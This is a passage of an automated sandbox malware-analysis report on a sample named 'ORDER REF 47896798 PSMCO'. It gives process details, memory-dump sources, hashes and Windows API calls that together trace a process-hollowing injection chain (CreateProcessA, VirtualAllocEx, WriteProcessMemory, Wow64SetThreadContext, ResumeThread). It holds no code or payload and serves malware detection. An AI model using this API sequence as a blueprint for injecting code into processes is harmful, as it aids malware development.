                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:12
                                                                                          Start time:08:59:38
                                                                                          Start date:08/01/2025
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff728280000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true


                                                                                            Execution Graph

                                                                                            Execution Coverage:11.7%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:1.4%
                                                                                            Total number of Nodes:219
                                                                                            Total number of Limit Nodes:16
                                                                                            Execution graph (node and edge dump from the report's graph view; not reproduced). API calls named in its nodes: PostMessageW, DuplicateHandle, CreateActCtxA, GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, ReadProcessMemory, Wow64SetThreadContext, VirtualAllocEx, ResumeThread, WriteProcessMemory, CreateProcessA, DrawTextExW, CreateIconFromResourceEx.

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not reproduced; legend: Executed / Not Executed. First listed block: 7ef99f8-7ef9a19.]
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \ lw
                                                                                            • API String ID: 0-2684086738
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D396
                                                                                            • GetCurrentThread.KERNEL32 ref: 0173D3D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D410
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0173D469
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D396
                                                                                            • GetCurrentThread.KERNEL32 ref: 0173D3D3
                                                                                            • GetCurrentProcess.KERNEL32 ref: 0173D410
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0173D469
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not reproduced; legend: Executed / Not Executed. First listed block: 7837435-78374d5; block 78375cf-7837689 calls CreateProcessA.]
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07837676
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph not reproduced; legend: Executed / Not Executed. First listed block: 7837440-78374d5; block 78375cf-7837689 calls CreateProcessA.]
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07837676
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B5C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0

                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 017359C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0

                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 017359C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0

                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0

                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0

                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07EF213D,?,?), ref: 07EF21EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0

                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07837248
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0

                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07837248
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0

                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D9EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07837328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0783709E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0783709E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0173D9EF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07837328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            APIs
                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07EF372A,?,?,?,?,?), ref: 07EF37CF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFromIconResource
                                                                                            • String ID:
                                                                                            • API String ID: 3668623891-0
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07837166
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07837166
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0173B5C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07839DCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07839DCD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114498793.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12cd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114498793.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12cd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114537790.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_12dd000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                            • Instruction ID: 0815ad96faeb4236c8af7f6ef9d256f8aaebeced119451a4a918a1dcb8fc6156
                                                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                            • Instruction Fuzzy Hash: 5011BB75504684DFDB02CF54C5C4B15BBB1FB84224F24C6A9D9494B6A7C33AD40ACB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 63dd177feb911ce35bb8c73eb81be745d26621b9f6491404e9ed3762828c4161
                                                                                            • Instruction ID: 6b2a5a63d0adbb9adf68d3fbde726325d3687defa2bdd3bf9403a2a70188f846
                                                                                            • Opcode Fuzzy Hash: 63dd177feb911ce35bb8c73eb81be745d26621b9f6491404e9ed3762828c4161
                                                                                            • Instruction Fuzzy Hash: A9E10EB4E101598FDB14CFA9C580AAEFBB2FF89304F248169D818A7356D7749D42CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08f5274a7fd135b5dda05748d2ef0bce9616a5ff7497143267ca8ff07fc3b88f
                                                                                            • Instruction ID: 95851bbc07f7e43eb940f3916aa0a38221184a44d963c0c2233500a40dcaca36
                                                                                            • Opcode Fuzzy Hash: 08f5274a7fd135b5dda05748d2ef0bce9616a5ff7497143267ca8ff07fc3b88f
                                                                                            • Instruction Fuzzy Hash: 10E1F9B4E002599FDB14CF99C580AAEFBB2FF49304F248269D814A7356D734A942CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e810a9b131bda102f25296bc354c3ac5dd17748f19452e5ae67837ce054d081c
                                                                                            • Instruction ID: 1575ecfb7dffe2f529ab5fcb5a69e73ea2d0cad0b432b67cc275639eeeee7fd8
                                                                                            • Opcode Fuzzy Hash: e810a9b131bda102f25296bc354c3ac5dd17748f19452e5ae67837ce054d081c
                                                                                            • Instruction Fuzzy Hash: EFE11DB4E001598FDB14CFA9C590AAEFBB2FF89304F248269D414A7356D7359D42CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5917754792e99291e5ebb148356bae9c710cdaeacfb98ad5e1617d66c976b03
                                                                                            • Instruction ID: 4dc16812564eca34923d7d68e17322c0484eac063365d480e0dc17cbb4b59444
                                                                                            • Opcode Fuzzy Hash: c5917754792e99291e5ebb148356bae9c710cdaeacfb98ad5e1617d66c976b03
                                                                                            • Instruction Fuzzy Hash: FAE12DB4E001599FDB14CFA9C590AAEFBB2FF49304F248269D804AB355D735AD42CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2127863739.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7830000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb7a65c7a40a6406bbb16f22770b5c37442fd54e7349c1b5454b025b631ca4d7
                                                                                            • Instruction ID: 3eda81d5372959b07dee5a0a998c19e16fb765dd54b0d3e31376687d76424240
                                                                                            • Opcode Fuzzy Hash: bb7a65c7a40a6406bbb16f22770b5c37442fd54e7349c1b5454b025b631ca4d7
                                                                                            • Instruction Fuzzy Hash: 21E1FDB4E102598FDB14CF99C590AAEFBB2FF49304F248169D818A7356D7349D42CFA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2118492129.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1730000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee6ccb7c7839992c7cca4f8c220267c86f77c11fbbd8b500881d3ba3bf3498cc
                                                                                            • Instruction ID: a7fb7a5adebe19f9a81dde74ed78a46e21337628a7c12289b21ce38b589c5bf6
                                                                                            • Opcode Fuzzy Hash: ee6ccb7c7839992c7cca4f8c220267c86f77c11fbbd8b500881d3ba3bf3498cc
                                                                                            • Instruction Fuzzy Hash: 49A16E32E00219CFCF19DFB8D84459EBBB2FFC5300B15856AE905AB266DB75E916CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f08404140f22d4576c898a3b50bdbb85493e34e42eed6551f4582580e063d712
                                                                                            • Instruction ID: 0e6d99884861508f097678ec8cf72b5b95877a50f08027db82ec5d14dd3e9333
                                                                                            • Opcode Fuzzy Hash: f08404140f22d4576c898a3b50bdbb85493e34e42eed6551f4582580e063d712
                                                                                            • Instruction Fuzzy Hash: 09B172B5E016188FDB58CF6AD944ADDBBF2BF89300F14C1A9D509AB325DB305A858F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58fe30d03574e52438cfa8643151a9c4f086f458eb30c2ebf44db9841e1e016b
                                                                                            • Instruction ID: 2727e40e1412b88d8191421dd6a0c696a91d3cfe1f5eef43106af4133d002d95
                                                                                            • Opcode Fuzzy Hash: 58fe30d03574e52438cfa8643151a9c4f086f458eb30c2ebf44db9841e1e016b
                                                                                            • Instruction Fuzzy Hash: 0661EC71911A058FEB48DF7AE841A9ABFF2FBC4300F14D53AD118AB254DF786806DB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2128007437.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ef0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc5252fdefb7cd7264f62a15e9f0b05c82fd88b6aa04117b742f1c631ab8a920
                                                                                            • Instruction ID: b2fc4c5abcac4c115a1d5694dfc9be5b9d1117622dda284f63aa45f0c997147e
                                                                                            • Opcode Fuzzy Hash: cc5252fdefb7cd7264f62a15e9f0b05c82fd88b6aa04117b742f1c631ab8a920
                                                                                            • Instruction Fuzzy Hash: 3F61CB70911A098FE748DF6AE841A9ABFF2FBC4300F14D53AD118AB255DF786C06DB41

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.2%
                                                                                            Dynamic/Decrypted Code Coverage:4.7%
                                                                                            Signature Coverage:7.3%
